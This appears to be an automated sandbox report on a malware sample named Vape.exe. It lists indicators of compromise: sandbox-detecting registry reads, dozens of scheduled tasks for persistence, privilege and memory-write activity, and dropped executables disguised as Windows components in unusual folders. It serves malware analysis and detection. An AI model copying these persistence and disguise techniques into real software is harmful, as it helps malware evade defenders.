\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\HardwareID wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName wmiprvse.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe -
Creates scheduled task(s) 1 TTPs 43 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3688 schtasks.exe 3808 schtasks.exe 1584 schtasks.exe 4132 schtasks.exe 1760 schtasks.exe 1688 schtasks.exe 1784 schtasks.exe 68 schtasks.exe 4320 schtasks.exe 532 schtasks.exe 4904 schtasks.exe 2584 schtasks.exe 3324 schtasks.exe 652 schtasks.exe 4796 schtasks.exe 4436 schtasks.exe 1924 schtasks.exe 4384 schtasks.exe 4780 schtasks.exe 4956 schtasks.exe 1692 schtasks.exe 3532 schtasks.exe 3492 schtasks.exe 4212 schtasks.exe 1592 schtasks.exe 4272 schtasks.exe 2324 schtasks.exe 1700 schtasks.exe 1336 schtasks.exe 1492 schtasks.exe 196 schtasks.exe 4904 schtasks.exe 2144 schtasks.exe 4428 schtasks.exe 2664 schtasks.exe 968 schtasks.exe 2088 schtasks.exe 2288 schtasks.exe 428 schtasks.exe 2284 schtasks.exe 2572 schtasks.exe 828 schtasks.exe 1240 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 6612 timeout.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 4568 tasklist.exe 4956 tasklist.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedialer.exeOfficeClickToRun.exesvchost.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates dialer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs dialer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT dialer.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe -
Modifies registry class 2 IoCs
Processes:
Microsoft_Protection.exeIntoref.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings Microsoft_Protection.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings Intoref.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exeMicrosoft_crypt.exepowershell.exedialer.exelhhsgwktkatl.exepowershell.exeIntoref.exewmiprvse.exepid process 2204 powershell.exe 2204 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 2476 powershell.exe 2476 powershell.exe 2204 powershell.exe 2476 powershell.exe 1012 powershell.exe 2476 powershell.exe 2204 powershell.exe 4680 Microsoft_crypt.exe 3344 powershell.exe 3344 powershell.exe 3344 powershell.exe 4680 Microsoft_crypt.exe 4680 Microsoft_crypt.exe 4680 Microsoft_crypt.exe 4680 Microsoft_crypt.exe 4680 Microsoft_crypt.exe 4680 Microsoft_crypt.exe 4680 Microsoft_crypt.exe 2932 dialer.exe 2932 dialer.exe 4680 Microsoft_crypt.exe 4680 Microsoft_crypt.exe 4680 Microsoft_crypt.exe 2932 dialer.exe 2932 dialer.exe 1208 lhhsgwktkatl.exe 2932 dialer.exe 2932 dialer.exe 392 powershell.exe 392 powershell.exe 2932 dialer.exe 2932 dialer.exe 2932 dialer.exe 392 powershell.exe 392 powershell.exe 2932 dialer.exe 2932 dialer.exe 2932 dialer.exe 2932 dialer.exe 2932 dialer.exe 2932 dialer.exe 4996 Intoref.exe 4996 Intoref.exe 4996 Intoref.exe 4996 Intoref.exe 392 powershell.exe 2932 dialer.exe 2932 dialer.exe 2932 dialer.exe 2932 dialer.exe 2932 dialer.exe 4996 Intoref.exe 2932 dialer.exe 2932 dialer.exe 2932 dialer.exe 2932 dialer.exe 3060 wmiprvse.exe 2932 dialer.exe 2932 dialer.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
csrss.exepid process 4756 csrss.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Msvchost.exetasklist.exetasklist.exeWMIC.exeWMIC.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3456 Msvchost.exe Token: SeDebugPrivilege 4956 tasklist.exe Token: SeDebugPrivilege 4568 tasklist.exe Token: SeIncreaseQuotaPrivilege 4620 WMIC.exe Token: SeSecurityPrivilege 4620 WMIC.exe Token: SeTakeOwnershipPrivilege 4620 WMIC.exe Token: SeLoadDriverPrivilege 4620 WMIC.exe Token: SeSystemProfilePrivilege 4620 WMIC.exe Token: SeSystemtimePrivilege 4620 WMIC.exe Token: SeProfSingleProcessPrivilege 4620 WMIC.exe Token: SeIncBasePriorityPrivilege 4620 WMIC.exe Token: SeCreatePagefilePrivilege 4620 WMIC.exe Token: SeBackupPrivilege 4620 WMIC.exe Token: SeRestorePrivilege 4620 WMIC.exe Token: SeShutdownPrivilege 4620 WMIC.exe Token: SeDebugPrivilege 4620 WMIC.exe Token: SeSystemEnvironmentPrivilege 4620 WMIC.exe Token: SeRemoteShutdownPrivilege 4620 WMIC.exe Token: SeUndockPrivilege 4620 WMIC.exe Token: SeManageVolumePrivilege 4620 WMIC.exe Token: 33 4620 WMIC.exe Token: 34 4620 WMIC.exe Token: 35 4620 WMIC.exe Token: 36 4620 WMIC.exe Token: SeIncreaseQuotaPrivilege 4324 WMIC.exe Token: SeSecurityPrivilege 4324 WMIC.exe Token: SeTakeOwnershipPrivilege 4324 WMIC.exe Token: SeLoadDriverPrivilege 4324 WMIC.exe Token: SeSystemProfilePrivilege 4324 WMIC.exe Token: SeSystemtimePrivilege 4324 WMIC.exe Token: SeProfSingleProcessPrivilege 4324 WMIC.exe Token: SeIncBasePriorityPrivilege 4324 WMIC.exe Token: SeCreatePagefilePrivilege 4324 WMIC.exe Token: SeBackupPrivilege 4324 WMIC.exe Token: SeRestorePrivilege 4324 WMIC.exe Token: SeShutdownPrivilege 4324 WMIC.exe Token: SeDebugPrivilege 4324 WMIC.exe Token: SeSystemEnvironmentPrivilege 4324 WMIC.exe Token: SeRemoteShutdownPrivilege 4324 WMIC.exe Token: SeUndockPrivilege 4324 WMIC.exe Token: SeManageVolumePrivilege 4324 WMIC.exe Token: 33 4324 WMIC.exe Token: 34 4324 WMIC.exe Token: 35 4324 WMIC.exe Token: 36 4324 WMIC.exe Token: SeDebugPrivilege 2204 powershell.exe Token: SeDebugPrivilege 1012 powershell.exe Token: SeDebugPrivilege 2476 powershell.exe Token: SeIncreaseQuotaPrivilege 4620 WMIC.exe Token: SeSecurityPrivilege 4620 WMIC.exe Token: SeTakeOwnershipPrivilege 4620 WMIC.exe Token: SeLoadDriverPrivilege 4620 WMIC.exe Token: SeSystemProfilePrivilege 4620 WMIC.exe Token: SeSystemtimePrivilege 4620 WMIC.exe Token: SeProfSingleProcessPrivilege 4620 WMIC.exe Token: SeIncBasePriorityPrivilege 4620 WMIC.exe Token: SeCreatePagefilePrivilege 4620 WMIC.exe Token: SeBackupPrivilege 4620 WMIC.exe Token: SeRestorePrivilege 4620 WMIC.exe Token: SeShutdownPrivilege 4620 WMIC.exe Token: SeDebugPrivilege 4620 WMIC.exe Token: SeSystemEnvironmentPrivilege 4620 WMIC.exe Token: SeRemoteShutdownPrivilege 4620 WMIC.exe Token: SeUndockPrivilege 4620 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Vape.exeMicrosoft_R.exeMicrosoft_Protection.exeMicrosoft_M.exeMicrosoft_R.exeMicrosoft_M.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exeMsvchost.exeMicrosoft_crypt.execmd.exedescription pid process target process PID 824 wrote to memory of 660 824 Vape.exe Microsoft_Protection.exe PID 824 wrote to memory of 660 824 Vape.exe Microsoft_Protection.exe PID 824 wrote to memory of 660 824 Vape.exe Microsoft_Protection.exe PID 824 wrote to memory of 4680 824 Vape.exe Conhost.exe PID 824 wrote to memory of 4680 824 Vape.exe Conhost.exe PID 824 wrote to memory of 5088 824 Vape.exe Microsoft_R.exe PID 824 wrote to memory of 5088 824 Vape.exe Microsoft_R.exe PID 5088 wrote to memory of 4660 5088 Microsoft_R.exe Microsoft_R.exe PID 5088 wrote to memory of 4660 5088 Microsoft_R.exe Microsoft_R.exe PID 660 wrote to memory of 640 660 Microsoft_Protection.exe powercfg.exe PID 660 wrote to memory of 640 660 Microsoft_Protection.exe powercfg.exe PID 660 wrote to memory of 640 660 Microsoft_Protection.exe powercfg.exe PID 824 wrote to memory of 4752 824 Vape.exe Microsoft_M.exe PID 824 wrote to memory of 4752 824 Vape.exe Microsoft_M.exe PID 824 wrote to memory of 3456 824 Vape.exe Msvchost.exe PID 824 wrote to memory of 3456 824 Vape.exe Msvchost.exe PID 4752 wrote to memory of 4856 4752 Microsoft_M.exe Microsoft_M.exe PID 4752 wrote to memory of 4856 4752 Microsoft_M.exe Microsoft_M.exe PID 4660 wrote to memory of 392 4660 Microsoft_R.exe cmd.exe PID 4660 wrote to memory of 392 4660 Microsoft_R.exe cmd.exe PID 4660 wrote to memory of 4216 4660 Microsoft_R.exe cmd.exe PID 4660 wrote to memory of 4216 4660 Microsoft_R.exe cmd.exe PID 4660 wrote to memory of 3192 4660 Microsoft_R.exe cmd.exe PID 4660 wrote to memory of 3192 4660 Microsoft_R.exe cmd.exe PID 4856 wrote to memory of 1688 4856 Microsoft_M.exe schtasks.exe PID 4856 wrote to memory of 1688 4856 Microsoft_M.exe schtasks.exe PID 4856 wrote to memory of 1444 4856 Microsoft_M.exe cmd.exe PID 4856 wrote to memory of 1444 4856 Microsoft_M.exe cmd.exe PID 4660 wrote to memory of 3576 4660 Microsoft_R.exe cmd.exe PID 4660 wrote to memory of 3576 4660 Microsoft_R.exe cmd.exe PID 4856 wrote to memory of 888 4856 Microsoft_M.exe cmd.exe PID 4856 wrote to memory of 888 4856 Microsoft_M.exe cmd.exe PID 4856 wrote to memory of 2588 4856 Microsoft_M.exe powercfg.exe PID 4856 wrote to memory of 2588 4856 Microsoft_M.exe powercfg.exe PID 392 wrote to memory of 1012 392 cmd.exe powershell.exe PID 392 wrote to memory of 1012 392 cmd.exe powershell.exe PID 4216 wrote to memory of 2204 4216 cmd.exe powershell.exe PID 4216 wrote to memory of 2204 4216 cmd.exe powershell.exe PID 888 wrote to memory of 4956 888 cmd.exe schtasks.exe PID 888 wrote to memory of 4956 888 cmd.exe schtasks.exe PID 3576 wrote to memory of 4620 3576 cmd.exe WMIC.exe PID 3576 wrote to memory of 4620 3576 cmd.exe WMIC.exe PID 3192 wrote to memory of 4568 3192 cmd.exe tasklist.exe PID 3192 wrote to memory of 4568 3192 cmd.exe tasklist.exe PID 1444 wrote to memory of 2476 1444 cmd.exe powershell.exe PID 1444 wrote to memory of 2476 1444 cmd.exe powershell.exe PID 2588 wrote to memory of 4324 2588 cmd.exe WMIC.exe PID 2588 wrote to memory of 4324 2588 cmd.exe WMIC.exe PID 1688 wrote to memory of 1896 1688 cmd.exe powershell.exe PID 1688 wrote to memory of 1896 1688 cmd.exe powershell.exe PID 1444 wrote to memory of 492 1444 cmd.exe MpCmdRun.exe PID 1444 wrote to memory of 492 1444 cmd.exe MpCmdRun.exe PID 4216 wrote to memory of 4296 4216 cmd.exe MpCmdRun.exe PID 4216 wrote to memory of 4296 4216 cmd.exe MpCmdRun.exe PID 3456 wrote to memory of 2284 3456 Msvchost.exe schtasks.exe PID 3456 wrote to memory of 2284 3456 Msvchost.exe schtasks.exe PID 4680 wrote to memory of 2932 4680 Microsoft_crypt.exe dialer.exe PID 4680 wrote to memory of 2932 4680 Microsoft_crypt.exe dialer.exe PID 4680 wrote to memory of 2932 4680 Microsoft_crypt.exe dialer.exe PID 4680 wrote to memory of 2932 4680 Microsoft_crypt.exe dialer.exe PID 4680 wrote to memory of 2932 4680 Microsoft_crypt.exe dialer.exe PID 4680 wrote to memory of 2932 4680 Microsoft_crypt.exe dialer.exe PID 4680 wrote to memory of 2932 4680 Microsoft_crypt.exe dialer.exe PID 1960 wrote to memory of 604 1960 cmd.exe wusa.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exeC:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exeC:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exeC:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exeC:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exeC:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe2⤵
- Executes dropped EXE
-
C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"2⤵
- Executes dropped EXE
-
C:\Webdriversession\cmd.exeC:\Webdriversession\cmd.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exeC:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe2⤵
- Executes dropped EXE
-
C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe"C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exeC:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe2⤵
- Executes dropped EXE
-
C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe"C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe"2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Reference Assemblies\Microsoft\sc.exe"C:\Program Files (x86)\Reference Assemblies\Microsoft\sc.exe"2⤵
- Executes dropped EXE
- Launches sc.exe
-
C:\Users\Default User\dllhost.exe"C:\Users\Default User\dllhost.exe"2⤵
- Executes dropped EXE
-
C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"2⤵
- Executes dropped EXE
-
C:\Webdriversession\cmd.exeC:\Webdriversession\cmd.exe2⤵
- Executes dropped EXE
-
C:\Program Files\VideoLAN\VLC\plugins\explorer.exe"C:\Program Files\VideoLAN\VLC\plugins\explorer.exe"2⤵
- Executes dropped EXE
-
C:\Webdriversession\OfficeClickToRun.exeC:\Webdriversession\OfficeClickToRun.exe2⤵
- Executes dropped EXE
-
C:\Webdriversession\wininit.exeC:\Webdriversession\wininit.exe2⤵
- Executes dropped EXE
-
C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe"C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe"2⤵
- Executes dropped EXE
-
C:\Program Files\Windows NT\TableTextService\unsecapp.exe"C:\Program Files\Windows NT\TableTextService\unsecapp.exe"2⤵
- Executes dropped EXE
-
C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe"C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe"2⤵
- Executes dropped EXE
-
C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"2⤵
- Executes dropped EXE
-
C:\Webdriversession\cmd.exeC:\Webdriversession\cmd.exe2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Reference Assemblies\Microsoft\sc.exe"C:\Program Files (x86)\Reference Assemblies\Microsoft\sc.exe"2⤵
- Executes dropped EXE
- Launches sc.exe
-
C:\Users\Default User\dllhost.exe"C:\Users\Default User\dllhost.exe"2⤵
- Executes dropped EXE
-
C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe"C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe"2⤵
- Executes dropped EXE
-
C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"2⤵
- Executes dropped EXE
-
C:\Webdriversession\cmd.exeC:\Webdriversession\cmd.exe2⤵
- Executes dropped EXE
-
C:\Program Files\VideoLAN\VLC\plugins\explorer.exe"C:\Program Files\VideoLAN\VLC\plugins\explorer.exe"2⤵
- Executes dropped EXE
-
C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe"C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe"2⤵
- Executes dropped EXE
-
C:\Webdriversession\OfficeClickToRun.exeC:\Webdriversession\OfficeClickToRun.exe2⤵
- Executes dropped EXE
-
C:\Webdriversession\wininit.exeC:\Webdriversession\wininit.exe2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Reference Assemblies\Microsoft\sc.exe"C:\Program Files (x86)\Reference Assemblies\Microsoft\sc.exe"2⤵
- Executes dropped EXE
- Launches sc.exe
-
